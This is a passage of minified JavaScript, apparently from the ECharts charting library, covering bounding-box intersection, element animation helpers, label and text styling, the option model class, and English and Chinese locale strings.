e&&Ae.set(e,0,0),Ch.reset(n,!r),!this._intersectCheckOneSide(this,t,r,1)&&(i=!1,r)||!this._intersectCheckOneSide(t,this,r,-1)&&(i=!1,r)||r||Ch.negativeSize||Ae.copy(e,i?Ch.useDir?Ch.dirMinTv:Ih:Dh),i},t.prototype._intersectCheckOneSide=function(t,e,n,i){for(var r=!0,o=0;o<2;o++){var a=t._axes[o];if(t._getProjMinMaxOnAxis(o,t._corners,Th),t._getProjMinMaxOnAxis(o,e._corners,kh),Ch.negativeSize||Th[1]<kh[0]||Th[0]>kh[1]){if(r=!1,Ch.negativeSize||n)return r;var s=Mh(kh[0]-Th[1]),l=Mh(Th[0]-kh[1]);wh(s,l)>Dh.len()&&(s<l?Ae.scale(Dh,a,-s*i):Ae.scale(Dh,a,l*i))}else if(!n){s=Mh(kh[0]-Th[1]),l=Mh(Th[0]-kh[1]);(Ch.useDir||wh(s,l)<Ih.len())&&((s<l||!Ch.bidirectional)&&(Ae.scale(Ih,a,s*i),Ch.useDir&&Ch.calcDirMTV()),(s>=l||!Ch.bidirectional)&&(Ae.scale(Ih,a,-l*i),Ch.useDir&&Ch.calcDirMTV()))}}return r},t.prototype._getProjMinMaxOnAxis=function(t,e,n){for(var i=this._axes[t],r=this._origin,o=e[0].dot(i)+r[t],a=o,s=o,l=1;l<e.length;l++){var u=e[l].dot(i)+r[t];a=wh(u,a),s=Sh(u,s)}n[0]=a+Ch.touchThreshold,n[1]=s-Ch.touchThreshold,Ch.negativeSize=n[1]<n[0]},t}(),Ph=[],Lh=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.notClear=!0,e.incremental=1,e._displayables=[],e._temporaryDisplayables=[],e._cursor=0,e}return n(e,t),e.prototype.traverse=function(t,e){t.call(e,this)},e.prototype.useStyle=function(){this.style={}},e.prototype._useHoverStyle=function(){this.__hoverStyle=null},e.prototype.getCursor=function(){return this._cursor},e.prototype.innerAfterBrush=function(){this._cursor=this._displayables.length},e.prototype.clearDisplaybles=function(){this._displayables=[],this._temporaryDisplayables=[],this._cursor=0,this.markRedraw(),this.notClear=!1},e.prototype.clearTemporalDisplayables=function(){this._temporaryDisplayables=[]},e.prototype.addDisplayable=function(t,e){e?this._temporaryDisplayables.push(t):this._displayables.push(t),this.markRedraw()},e.prototype.addDisplayables=function(t,e){e=e||!1;for(var n=0;n<t.length;n++)this.addDisplayable(t[n],e)},e.prototype.getDisplayables=function(){return this._displayables},e.prototype.getTemporalDisplayables=function(){return this._temporaryDisplayables},e.prototype.eachPendingDisplayable=function(t){for(var e=this._cursor;e<this._displayables.length;e++)t&&t(this._displayables[e]);for(e=0;e<this._temporaryDisplayables.length;e++)t&&t(this._temporaryDisplayables[e])},e.prototype.update=function(){this.updateTransform();for(var t=this._cursor;t<this._displayables.length;t++){(e=this._displayables[t]).parent=this,e.update(),e.parent=null}for(t=0;t<this._temporaryDisplayables.length;t++){var e;(e=this._temporaryDisplayables[t]).parent=this,e.update(),e.parent=null}},e.prototype.getBoundingRect=function(){if(!this._rect){for(var t=new Ue(1/0,1/0,-1/0,-1/0),e=0;e<this._displayables.length;e++){var n=this._displayables[e],i=n.getBoundingRect().clone();n.needLocalTransform()&&i.applyTransform(n.getLocalTransform(Ph)),t.union(i)}this._rect=t}return this._rect},e.prototype.contain=function(t,e){var n=this.transformCoordToLocal(t,e);if(this.getBoundingRect().contain(n[0],n[1]))for(var i=0;i<this._displayables.length;i++){if(this._displayables[i].contain(t,e))return!0}return!1},e}(Rs),Oh=Ta();function Rh(t,e,n,i,r){var o;if(e&&e.ecModel){var a=e.ecModel.getUpdatePayload();o=a&&a.animation}var s="update"===t;if(e&&e.isAnimationEnabled()){var l=void 0,u=void 0,c=void 0;return i?(l=at(i.duration,200),u=at(i.easing,"cubicOut"),c=0):(l=e.getShallow(s?"animationDurationUpdate":"animationDuration"),u=e.getShallow(s?"animationEasingUpdate":"animationEasing"),c=e.getShallow(s?"animationDelayUpdate":"animationDelay")),o&&(null!=o.duration&&(l=o.duration),null!=o.easing&&(u=o.easing),null!=o.delay&&(c=o.delay)),X(c)&&(c=c(n,r)),X(l)&&(l=l(n)),{duration:l||0,delay:c,easing:u}}return null}function Nh(t,e,n,i,r,o,a){var s,l=!1;X(r)?(a=o,o=r,r=null):$(r)&&(o=r.cb,a=r.during,l=r.isFrom,s=r.removeOpt,r=r.dataIndex);var u="leave"===t;u||e.stopAnimation("leave");var c=Rh(t,i,r,u?s||{}:null,i&&i.getAnimationDelayParams?i.getAnimationDelayParams(e,r):null);if(c&&c.duration>0){var h={duration:c.duration,delay:c.delay||0,easing:c.easing,done:o,force:!!o||!!a,setToFinal:!u,scope:t,during:a};l?e.animateFrom(n,h):e.animateTo(n,h)}else e.stopAnimation(),!l&&e.attr(n),a&&a(1),o&&o()}function Bh(t,e,n,i,r,o){Nh("update",t,e,n,i,r,o)}function zh(t,e,n,i,r,o){Nh("enter",t,e,n,i,r,o)}function Eh(t){if(!t.__zr)return!0;for(var e=0;e<t.animators.length;e++){if("leave"===t.animators[e].scope)return!0}return!1}function Vh(t,e,n,i,r,o){Eh(t)||Nh("leave",t,e,n,i,r,o)}function Fh(t,e,n,i){t.removeTextContent(),t.removeTextGuideLine(),Vh(t,{style:{opacity:0}},e,n,i)}function Hh(t,e,n){function i(){t.parent&&t.parent.remove(t)}t.isGroup?t.traverse(function(t){t.isGroup||Fh(t,e,n,i)}):Fh(t,e,n,i)}function Gh(t){Oh(t).oldStyle=t.style}var Wh={},Uh=["x","y"],Zh=["width","height"];function Yh(t){return Bl.extend(t)}var Xh=function(t,e){var i=Bc(t,e);return function(t){function e(e){var n=t.call(this,e)||this;return n.applyTransform=i.applyTransform,n.buildPath=i.buildPath,n}return n(e,t),e}(Rc)};function jh(t,e){return Xh(t,e)}function qh(t,e){Wh[t]=e}function Kh(t){if(Wh.hasOwnProperty(t))return Wh[t]}function $h(t,e,n,i){var r=function(t,e){return new Rc(Bc(t,e))}(t,e);return n&&("center"===i&&(n=Jh(n,r.getBoundingRect())),ep(r,n)),r}function Qh(t,e,n){var i=new Hl({style:{image:t,x:e.x,y:e.y,width:e.width,height:e.height},onload:function(t){if("center"===n){var r={width:t.width,height:t.height};i.setStyle(Jh(e,r))}}});return i}function Jh(t,e){var n,i=e.width/e.height,r=t.height*i;return n=r<=t.width?t.height:(r=t.width)/i,{x:t.x+t.width/2-r/2,y:t.y+t.height/2-n/2,width:r,height:n}}var tp=function(t,e){for(var n=[],i=t.length,r=0;r<i;r++){var o=t[r];n.push(o.getUpdatedPathProxy(!0))}var a=new Bl(e);return a.createPathProxy(),a.buildPath=function(t){if(Nc(t)){t.appendPath(n);var e=t.getContext();e&&t.rebuildPath(e,1)}},a};function ep(t,e){if(t.applyTransform){var n=t.getBoundingRect().calculateTransform(e);t.applyTransform(n)}}function np(t,e){return Wl(t,t,{lineWidth:e}),t}var ip=Zl;function rp(t,e){for(var n=we([]);t&&t!==e;)Me(n,t.getLocalTransform(),n),t=t.parent;return n}function op(t,e,n){return e&&!z(e)&&(e=Or.getLocalTransform(e)),n&&(e=Ie([],e)),Ut([],t,e)}function ap(t,e,n){var i=0===e[4]||0===e[5]||0===e[0]?1:To(2*e[4]/e[0]),r=0===e[4]||0===e[5]||0===e[2]?1:To(2*e[4]/e[2]),o=["left"===t?-i:"right"===t?i:0,"top"===t?-r:"bottom"===t?r:0];return o=op(o,e,n),To(o[0])>To(o[1])?o[0]>0?"right":"left":o[1]>0?"bottom":"top"}function sp(t){return!t.isGroup}function lp(t,e,n){if(t&&e){var i,r=(i={},t.traverse(function(t){sp(t)&&t.anid&&(i[t.anid]=t)}),i);e.traverse(function(t){if(sp(t)&&t.anid){var e=r[t.anid];if(e){var i=o(t);t.attr(o(e)),Bh(t,i,n,hu(t).dataIndex)}}})}function o(t){var e={x:t.x,y:t.y,rotation:t.rotation};return function(t){return null!=t.shape}(t)&&(e.shape=C(t.shape)),e}}function up(t,e){return V(t,function(t){var n=t[0];n=Mo(n,e.x),n=So(n,e.x+e.width);var i=t[1];return i=Mo(i,e.y),[n,i=So(i,e.y+e.height)]})}function cp(t,e){var n=Mo(t.x,e.x),i=So(t.x+t.width,e.x+e.width),r=Mo(t.y,e.y),o=So(t.y+t.height,e.y+e.height);if(i>=n&&o>=r)return{x:n,y:r,width:i-n,height:o-r}}function hp(t,e,n){var i=A({rectHover:!0},e),r=i.style={strokeNoScale:!0};if(n=n||{x:-1,y:-1,width:2,height:2},t)return 0===t.indexOf("image://")?(r.image=t.slice(8),L(r,n),new Hl(i)):$h(t.replace("path://",""),i,n,"center")}function pp(t,e,n,i,r,o,a,s){var l,u=n-t,c=i-e,h=a-r,p=s-o,d=dp(h,p,u,c);if((l=d)<=1e-6&&l>=-1e-6)return!1;var f=t-r,g=e-o,v=dp(f,g,u,c)/d;if(v<0||v>1)return!1;var y=dp(f,g,h,p)/d;return!(y<0||y>1)}function dp(t,e,n,i){return t*i-n*e}function fp(t,e,n,i,r){return null==e||(K(e)?gp[0]=gp[1]=gp[2]=gp[3]=e:(gp[0]=e[0],gp[1]=e[1],gp[2]=e[2],gp[3]=e[3]),i&&(gp[0]=Mo(0,gp[0]),gp[1]=Mo(0,gp[1]),gp[2]=Mo(0,gp[2]),gp[3]=Mo(0,gp[3])),n&&(gp[0]=-gp[0],gp[1]=-gp[1],gp[2]=-gp[2],gp[3]=-gp[3]),vp(t,gp,"x","width",3,1,r&&r[0]||0),vp(t,gp,"y","height",0,2,r&&r[1]||0)),t}var gp=[0,0,0,0];function vp(t,e,n,i,r,o,a){var s=e[o]+e[r],l=t[i];t[i]+=s,a=Mo(0,So(a,l)),t[i]<a?(t[i]=a,t[n]+=e[r]>=0?-e[r]:e[o]>=0?l+e[o]:To(s)>1e-8?(l-a)*e[r]/s:0):t[n]-=e[r]}function yp(t){var e=t.itemTooltipOption,n=t.componentModel,i=t.itemName,r=j(e)?{formatter:e}:e,o=n.mainType,a=n.componentIndex,s={componentType:o,name:i,$vars:["name"]};s[o+"Index"]=a;var l=t.formatterParamsExtra;l&&E(W(l),function(t){wt(s,t)||(s[t]=l[t],s.$vars.push(t))});var u=hu(t.el);u.componentMainType=o,u.componentIndex=a,u.tooltipConfig={name:i,option:L({content:i,encodeHTMLContent:!0,formatterParams:s},r)}}function mp(t,e){var n;t.isGroup&&(n=e(t)),n||t.traverse(e)}function _p(t,e){if(t)if(Y(t))for(var n=0;n<t.length;n++)mp(t[n],e);else mp(t,e)}function xp(t){return!t||To(t[1])<bp&&To(t[2])<bp||To(t[0])<bp&&To(t[3])<bp}var bp=1e-5;function wp(t,e){return t?Ue.copy(t,e):e.clone()}function Sp(t,e){return e?Se(t||[1,0,0,1,0,0],e):void 0}function Mp(t){return{z:t.get("z")||0,zlevel:t.get("zlevel")||0}}function Tp(t,e,n){kp(t,e,n,-1/0)}function kp(t,e,n,i){if(t.ignoreModelZ)return i;var r=t.getTextContent(),o=t.getTextGuideLine();if(t.isGroup)for(var a=t.childrenRef(),s=0;s<a.length;s++)i=Mo(kp(a[s],e,n,i),i);else t.z=e,t.zlevel=n,i=Mo(t.z2||0,i);if(r&&(r.z=e,r.zlevel=n,isFinite(i)&&(r.z2=i+2)),o){var l=t.textGuideLineConfig;o.z=e,o.zlevel=n,isFinite(i)&&(o.z2=i+(l&&l.showAbove?1:-1))}return i}var Cp=new Or;Cp.transform=[1,0,0,1,0,0],qh("circle",Ec),qh("ellipse",Fc),qh("sector",eh),qh("ring",ih),qh("polygon",ah),qh("polyline",lh),qh("rect",jl),qh("line",hh),qh("bezierCurve",gh),qh("arc",yh);var Ip=Object.freeze({__proto__:null,updateProps:Bh,initProps:zh,removeElement:Vh,removeElementWithFadeOut:Hh,isElementRemoved:Eh,XY:Uh,WH:Zh,HOVER_LAYER_NO:0,HOVER_LAYER_FROM_THRESHOLD:1,HOVER_LAYER_FOR_INCREMENTAL:2,extendShape:Yh,extendPath:jh,registerShape:qh,getShapeClass:Kh,makePath:$h,makeImage:Qh,mergePath:tp,resizePath:ep,subPixelOptimizeLine:np,subPixelOptimizeRect:function(t,e){return Ul(t,t,e),t},subPixelOptimize:ip,getTransform:rp,applyTransform:op,transformDirection:ap,groupTransition:lp,clipPointsByRect:up,clipRectByRect:cp,createIcon:hp,linePolygonIntersect:function(t,e,n,i,r){for(var o=0,a=r[r.length-1];o<r.length;o++){var s=r[o];if(pp(t,e,n,i,s[0],s[1],a[0],a[1]))return!0;a=s}},lineLineIntersect:pp,expandOrShrinkRect:fp,setTooltipConfig:yp,traverseElements:_p,isBoundingRectAxisAligned:xp,ensureCopyRect:wp,ensureCopyTransform:Sp,retrieveZInfo:Mp,calcZ2Range:function(t){var e=-1/0,n=1/0;function i(t){if(t&&!t.isGroup){var e=t.currentStates;if(e.length)for(var n=0;n<e.length;n++)r(t.states[e[n]]);r(t)}}function r(t){if(t){var i=t.z2;i>e&&(e=i),i<n&&(n=i)}}return mp(t,function(t){i(t),i(t.getTextContent()),i(t.getTextGuideLine())}),n>e&&(n=e=0),{min:n,max:e}},traverseUpdateZ:Tp,payloadDisableAnimation:function(t){return t.animation={duration:0},t},decomposeTransform:function(t,e){return e?Se(Cp.transform,e):we(Cp.transform),Cp.decomposeTransform(),Er(t,Cp),t},getCurrentCanvasPainter:function(t){var e=t.getZr().painter;return"canvas"===e.getType()?e:null},Group:ho,Image:Hl,Text:Ql,Circle:Ec,Ellipse:Fc,Sector:eh,Ring:ih,Polygon:ah,Polyline:lh,Rect:jl,Line:hh,BezierCurve:gh,Arc:yh,IncrementalDisplayable:Lh,CompoundPath:mh,LinearGradient:xh,RadialGradient:bh,BoundingRect:Ue,OrientedBoundingRect:Ah,Point:Ae,Path:Bl}),Dp={};function Ap(t,e,n){var i,r=t.labelFetcher,o=t.labelDataIndex,a=t.labelDimIndex,s=e.normal;r&&(i=r.getFormattedLabel(o,"normal",null,a,s&&s.get("formatter"),null!=n?{interpolatedValue:n}:null)),null==i&&(i=X(t.defaultText)?t.defaultText(o,t,n):t.defaultText);for(var l={normal:i},u=0;u<Du.length;u++){var c=Du[u],h=e[c];l[c]=at(r?r.getFormattedLabel(o,c,null,a,h&&h.get("formatter")):null,i)}return l}function Pp(t,e,n,i){n=n||Dp;for(var r=t instanceof Ql,o=!1,a=0;a<Au.length;a++){if((p=e[Au[a]])&&p.getShallow("show")){o=!0;break}}var s=r?t:t.getTextContent();if(o){r||(s||(s=new Ql,t.setTextContent(s)),t.stateProxy&&(s.stateProxy=t.stateProxy));var l=Ap(n,e),u=e.normal,c=!!u.getShallow("show"),h=Op(u,i&&i.normal,n,!1,!r);h.text=l.normal,r||t.setTextConfig(Rp(u,n,!1));for(a=0;a<Du.length;a++){var p,d=Du[a];if(p=e[d]){var f=s.ensureState(d),g=!!at(p.getShallow("show"),c);if(g!==c&&(f.ignore=!g),f.style=Op(p,i&&i[d],n,!0,!r),f.style.text=l[d],!r)t.ensureState(d).textConfig=Rp(p,n,!0)}}s.silent=!!u.getShallow("silent"),null!=s.style.x&&(h.x=s.style.x),null!=s.style.y&&(h.y=s.style.y),s.ignore=!c,s.useStyle(h),s.dirty(),n.enableTextSetter&&(Fp(s).setLabelText=function(t){var i=Ap(n,e,t);!function(t,e){for(var n=0;n<Du.length;n++){var i=Du[n],r=e[i],o=t.ensureState(i);o.style=o.style||{},o.style.text=r}var a=t.currentStates.slice();t.clearStates(!0),t.setStyle({text:e.normal}),t.useStates(a,!0)}(s,i)})}else s&&(s.ignore=!0);t.dirty()}function Lp(t,e){e=e||"label";for(var n={normal:t.getModel(e)},i=0;i<Du.length;i++){var r=Du[i];n[r]=t.getModel([r,e])}return n}function Op(t,e,n,i,r){var o={};return function(t,e,n,i,r){n=n||Dp;var o,a=e.ecModel,s=a&&a.option.textStyle,l=function(t){var e;for(;t&&t!==t.ecModel;){var n=(t.option||Dp).rich;if(n){e=e||{};for(var i=W(n),r=0;r<i.length;r++){e[i[r]]=1}}t=t.parentModel}return e}(e);if(l){o={};var u="richInheritPlainLabel",c=at(e.get(u),a?a.get(u):void 0);for(var h in l)if(l.hasOwnProperty(h)){var p=e.getModel(["rich",h]);Ep(o[h]={},p,s,e,c,n,i,r,!1,!0)}}o&&(t.rich=o);var d=e.get("overflow");d&&(t.overflow=d);var f=e.get("lineOverflow");f&&(t.lineOverflow=f);var g=t,v=e.get("minMargin");if(null!=v)v=K(v)?v/2:0,g.margin=[v,v,v,v],g.__marginType=Wp.minMargin;else{var y=e.get("textMargin");null!=y&&(g.margin=ut(y),g.__marginType=Wp.textMargin)}Ep(t,e,s,null,null,n,i,r,!0,!1)}(o,t,n,i,r),e&&A(o,e),o}function Rp(t,e,n){e=e||{};var i,r={},o=t.getShallow("rotate"),a=at(t.getShallow("distance"),n?null:5),s=t.getShallow("offset");return"outside"===(i=t.getShallow("position")||(n?null:"inside"))&&(i=e.defaultOutsidePosition||"top"),null!=i&&(r.position=i),null!=s&&(r.offset=s),null!=o&&(o*=Math.PI/180,r.rotation=o),null!=a&&(r.distance=a),r.outsideFill="inherit"===t.get("color")?e.inheritColor||null:"auto",null!=e.autoOverflowArea&&(r.autoOverflowArea=e.autoOverflowArea),null!=e.layoutRect&&(r.layoutRect=e.layoutRect),r}var Np=["fontStyle","fontWeight","fontSize","fontFamily","textShadowColor","textShadowBlur","textShadowOffsetX","textShadowOffsetY"],Bp=["align","lineHeight","width","height","tag","verticalAlign","ellipsis"],zp=["padding","borderWidth","borderRadius","borderDashOffset","backgroundColor","borderColor","shadowColor","shadowBlur","shadowOffsetX","shadowOffsetY"];function Ep(t,e,n,i,r,o,a,s,l,u){n=!a&&n||Dp;var c=o&&o.inheritColor,h=e.getShallow("color"),p=e.getShallow("textBorderColor"),d=at(e.getShallow("opacity"),n.opacity);"inherit"!==h&&"auto"!==h||(h=c||null),"inherit"!==p&&"auto"!==p||(p=c||null),s||(h=h||n.color,p=p||n.textBorderColor),null!=h&&(t.fill=h),null!=p&&(t.stroke=p);var f=at(e.getShallow("textBorderWidth"),n.textBorderWidth);null!=f&&(t.lineWidth=f);var g=at(e.getShallow("textBorderType"),n.textBorderType);null!=g&&(t.lineDash=g);var v=at(e.getShallow("textBorderDashOffset"),n.textBorderDashOffset);null!=v&&(t.lineDashOffset=v),a||null!=d||u||(d=o&&o.defaultOpacity),null!=d&&(t.opacity=d),a||s||null==t.fill&&o.inheritColor&&(t.fill=o.inheritColor);for(var y=0;y<Np.length;y++){var m=Np[y];null!=(x=!1!==r&&i?st(e.getShallow(m),i.getShallow(m),n[m]):at(e.getShallow(m),n[m]))&&(t[m]=x)}for(y=0;y<Bp.length;y++){m=Bp[y];null!=(x=e.getShallow(m))&&(t[m]=x)}if(null==t.verticalAlign){var _=e.getShallow("baseline");null!=_&&(t.verticalAlign=_)}if(!l||!o.disableBox){for(y=0;y<zp.length;y++){var x;m=zp[y];null!=(x=e.getShallow(m))&&(t[m]=x)}var b=e.getShallow("borderType");null!=b&&(t.borderDash=b),"auto"!==t.backgroundColor&&"inherit"!==t.backgroundColor||!c||(t.backgroundColor=c),"auto"!==t.borderColor&&"inherit"!==t.borderColor||!c||(t.borderColor=c)}}function Vp(t,e){var n=e&&e.getModel("textStyle");return ht([t.fontStyle||n&&n.getShallow("fontStyle")||"",t.fontWeight||n&&n.getShallow("fontWeight")||"",(t.fontSize||n&&n.getShallow("fontSize")||12)+"px",t.fontFamily||n&&n.getShallow("fontFamily")||"sans-serif"].join(" "))}var Fp=Ta();var Hp,Gp,Wp={minMargin:1,textMargin:2},Up=["textStyle","color"],Zp=["fontStyle","fontWeight","fontSize","fontFamily","padding","lineHeight","rich","width","height","overflow"],Yp=new Ql,Xp=function(){function t(){}return t.prototype.getTextColor=function(t){var e=this.ecModel;return this.getShallow("color")||(!t&&e?e.get(Up):null)},t.prototype.getFont=function(){return Vp({fontStyle:this.getShallow("fontStyle"),fontWeight:this.getShallow("fontWeight"),fontSize:this.getShallow("fontSize"),fontFamily:this.getShallow("fontFamily")},this.ecModel)},t.prototype.getTextRect=function(t){for(var e={text:t,verticalAlign:this.getShallow("verticalAlign")||this.getShallow("baseline")},n=0;n<Zp.length;n++)e[Zp[n]]=this.getShallow(Zp[n]);return Yp.useStyle(e),Yp.update(),Yp.getBoundingRect()},t}(),jp=[["lineWidth","width"],["stroke","color"],["opacity"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["shadowColor"],["lineDash","type"],["lineDashOffset","dashOffset"],["lineCap","cap"],["lineJoin","join"],["miterLimit"]],qp=is(jp),Kp=function(){function t(){}return t.prototype.getLineStyle=function(t){return qp(this,t)},t}(),$p=[["fill","color"],["stroke","borderColor"],["lineWidth","borderWidth"],["opacity"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["shadowColor"],["lineDash","borderType"],["lineDashOffset","borderDashOffset"],["lineCap","borderCap"],["lineJoin","borderJoin"],["miterLimit","borderMiterLimit"]],Qp=is($p),Jp=function(){function t(){}return t.prototype.getItemStyle=function(t,e){return Qp(this,t,e)},t}(),td=function(){function t(t,e,n){this.parentModel=e,this.ecModel=n,this.option=t}return t.prototype.init=function(t,e,n){for(var i=[],r=3;r<arguments.length;r++)i[r-3]=arguments[r]},t.prototype.mergeOption=function(t,e){I(this.option,t,!0)},t.prototype.get=function(t,e){return null==t?this.option:this._doGet(this.parsePath(t),!e&&this.parentModel)},t.prototype.getShallow=function(t,e){var n=this.option,i=null==n?n:n[t];if(null==i&&!e){var r=this.parentModel;r&&(i=r.getShallow(t))}return i},t.prototype.getModel=function(e,n){var i=null!=e,r=i?this.parsePath(e):null;return new t(i?this._doGet(r):this.option,n=n||this.parentModel&&this.parentModel.getModel(this.resolveParentPath(r)),this.ecModel)},t.prototype.isEmpty=function(){return null==this.option},t.prototype.restoreData=function(){},t.prototype.clone=function(){return new(0,this.constructor)(C(this.option))},t.prototype.parsePath=function(t){return"string"==typeof t?t.split("."):t},t.prototype.resolveParentPath=function(t){return t},t.prototype.isAnimationEnabled=function(){if(!r.node&&this.option){if(null!=this.option.animation)return!!this.option.animation;if(this.parentModel)return this.parentModel.isAnimationEnabled()}},t.prototype._doGet=function(t,e){var n=this.option;if(!t)return n;for(var i=0;i<t.length&&(!t[i]||null!=(n=n&&"object"==typeof n?n[t[i]]:null));i++);return null==n&&e&&(n=e._doGet(this.resolveParentPath(t),e.parentModel)),n},t}();$a(td),Hp=td,Gp=["__\0is_clz",Ja++].join("_"),Hp.prototype[Gp]=!0,Hp.isInstance=function(t){return!(!t||!t[Gp])},B(td,Kp),B(td,Jp),B(td,os),B(td,Xp);var ed=Math.round(10*Math.random());function nd(t){return[t||"",ed++].join("_")}function id(t,e){return I(I({},t,!0),e,!0)}var rd="ZH",od="EN",ad=od,sd={},ld={},ud=r.domSupported&&(document.documentElement.lang||navigator.language||navigator.browserLanguage||ad).toUpperCase().indexOf(rd)>-1?rd:ad;function cd(t,e){t=t.toUpperCase(),ld[t]=new td(e),sd[t]=e}cd(od,{time:{month:["January","February","March","April","May","June","July","August","September","October","November","December"],monthAbbr:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],dayOfWeek:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],dayOfWeekAbbr:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]},legend:{selector:{all:"All",inverse:"Inv"}},toolbox:{brush:{title:{rect:"Box Select",polygon:"Lasso Select",lineX:"Horizontally Select",lineY:"Vertically Select",keep:"Keep Selections",clear:"Clear Selections"}},dataView:{title:"Data View",lang:["Data View","Close","Refresh"]},dataZoom:{title:{zoom:"Zoom",back:"Zoom Reset"}},magicType:{title:{line:"Switch to Line Chart",bar:"Switch to Bar Chart",stack:"Stack",tiled:"Tile"}},restore:{title:"Restore"},saveAsImage:{title:"Save as Image",lang:["Right Click to Save Image"]}},series:{typeNames:{pie:"Pie chart",bar:"Bar chart",line:"Line chart",scatter:"Scatter plot",effectScatter:"Ripple scatter plot",radar:"Radar chart",tree:"Tree",treemap:"Treemap",boxplot:"Boxplot",candlestick:"Candlestick",k:"K line chart",heatmap:"Heat map",map:"Map",parallel:"Parallel coordinate map",lines:"Line graph",graph:"Relationship graph",sankey:"Sankey diagram",funnel:"Funnel chart",gauge:"Gauge",pictorialBar:"Pictorial bar",themeRiver:"Theme River Map",sunburst:"Sunburst",custom:"Custom chart",chart:"Chart"}},aria:{general:{withTitle:'This is a chart about "{title}"',withoutTitle:"This is a chart"},series:{single:{prefix:"",withName:" with type {seriesType} named {seriesName}.",withoutName:" with type {seriesType}."},multiple:{prefix:". It consists of {seriesCount} series count.",withName:" The {seriesId} series is a {seriesType} representing {seriesName}.",withoutName:" The {seriesId} series is a {seriesType}.",separator:{middle:"",end:""}}},data:{allData:"The data is as follows: ",partialData:"The first {displayCnt} items are: ",withName:"the data for {name} is {value}",withoutName:"{value}",separator:{middle:", ",end:". "}}}}),cd(rd,{time:{month:["一月","二月","三月","四月","五月","六月","七月","八月","九月","十月","十一月","十二月"],monthAbbr:["1月","2月","3月","4月","5月","6月","7月","8月","9月","10月","11月","12月"],dayOfWeek:["星期日","星期一","星期二","星期三","星期四","星期五","星期六"],dayOfWeekAbbr:["日","一","二","三","四","五","六"]},legend:{selector:{all:"全选",inverse:"反选"}},toolbox:{brush:{title:{rect:"矩形选择",polygon:"圈选",lineX:"横向选择",lineY:"纵向选择",keep:"保持选择",clear:"清除选择"}},dataView:{title:"数据视图",lang:["数据视图","关闭","刷新"]},dataZoom:{title:{zoom:"区域缩放",back:"区域缩放还原"}},magicType:{title:{line:"切换为折线图",bar:"切换为柱状图",stack:"切换为堆叠",tiled:"切换为平铺"}},restore:{title:"还原"},saveAsImage:{title:"保存为图片",lang:["右键另存为图片"]}},series:{typeNames:{pie:"饼图",bar:"柱状图",line:"折线图",scatter:"散点图",effectScatter:"涟漪散点图",radar:"雷达图",tree:"树图",treemap:"矩形树图",boxplot:"箱型图",candlestick:"K线图",k:"K线图",heatmap:"热力图",map:"地图",parallel:"平行坐标图",lines:"线图",graph:"关系图",sankey:"桑基图",funnel:"漏斗图",gauge:"仪表盘图",pictorialBar:"象形柱图",themeRiver:"主题河流图",sunburst:"旭日图",custom:"自定义图表",chart:"图表"}},aria:{general:{withTitle:"这是一个关于“{title}”的图表。",withoutTitle:"这是一个图表,"},series:{single:{prefix:"",withName:"图表类型是{seriesType},表示{seriesName}。",withoutName:"图表类型是{seriesType}。"},multiple:{prefix:"它由{seriesCount}个图表系列组成。",withName:"第{seriesId}个系列是一个表示{seriesName}的{seriesType},",withoutName:"第{seriesId}个系列是一个{seriesType},",separator:{middle:";",end:"。"}}},data:{allData:"其数据是——",partialData:"其中,前{displayCnt}项是——",withName:"{name}的数据是{value}",withoutName:"{value}",separator:{middle:",",end:""}}}});var hd=null;function pd(){return hd}function dd(t,e){var n=pd(),i=e.breakOption,r=e.breakParsed;return!r&&n&&(r=n.parseAxisBreakOption(i,t)),r}function fd(t){var e=t.brk;return e?e.breaks:[]}function gd(t){var e=t.brk;return!!e&&e.hasBreaks()}var vd=1e3,yd=6e4,md=36e5,_d=864e5,xd=31536e6,bd={year:/({yyyy}|{yy})/,month:/({MMMM}|{MMM}|{MM}|{M})/,day:/({dd}|{d})/,hour:/({HH}|{H}|{hh}|{h})/,minute:/({mm}|{m})/,second:/({ss}|{s})/,millisecond:/({SSS}|{S})/},wd={year:"{yyyy}",month:"{MMM}",day:"{d}",hour:"{HH}:{mm}",minute:"{HH}:{mm}",second:"{HH}:{mm}:{ss}",millisecond:"{HH}:{mm}:{ss} {SSS}"},Sd="{yyyy}-{MM}-{dd}",Md={year:"{yyyy}",month:"{yyyy}-{MM}",day:Sd,hour:Sd+" "+wd.hour,minute:Sd+" "+wd.minute,second:Sd+" "+wd.second,millisecond:"{yyyy}-{MM}-{dd} {HH}:{mm}:{ss} {SSS}"},Td=["year","month","day","hour","minute","second","millisecond"],kd=["year","half-year","quarter","month","week","half-week","day","half-day","quarter-day","hour","minute","second","millisecond"];function Cd(t){return j(t)||X(t)?t:function(t){t=t||{};var e={},n=!0;return E(Td,function(e){n&&(n=null==t[e])}),E(Td,function(i,r){var o=t[i];e[i]={};for(var a=null,s=r;s>=0;s--){var l=Td[s],u=$(o)&&!Y(o)?o[l]:o,c=void 0;Y(u)?a=(c=u.slice())[0]||"":j(u)?c=[a=u]:(null==a?a=wd[i]:bd[l].test(a)||(a=e[l][l][0]+" "+a),c=[a],n&&(c[1]="{primary|"+a+"}")),e[i][l]=c}}),e}(t)}function Id(t,e){return"0000".substr(0,e-(t+="").length)+t}function Dd(t){switch(t){case"half-year":case"quarter":return"month";case"week":case"half-week":return"day";case"half-day":case"quarter-day":return"hour";default:return t}}function Ad(t){return t===Dd(t)}function Pd(t,e,n,i){var r=jo(t),o=r[Rd(n)](),a=r[Nd(n)]()+1,s=Math.floor((a-1)/3)+1,l=r[Bd(n)](),u=r["get"+(n?"UTC":"")+"Day"](),c=r[zd(n)](),h=(c-1)%12+1,p=r[Ed(n)](),d=r[Vd(n)](),f=r[Fd(n)](),g=c>=12?"pm":"am",v=g.toUpperCase(),y=i instanceof td?i:function(t){return 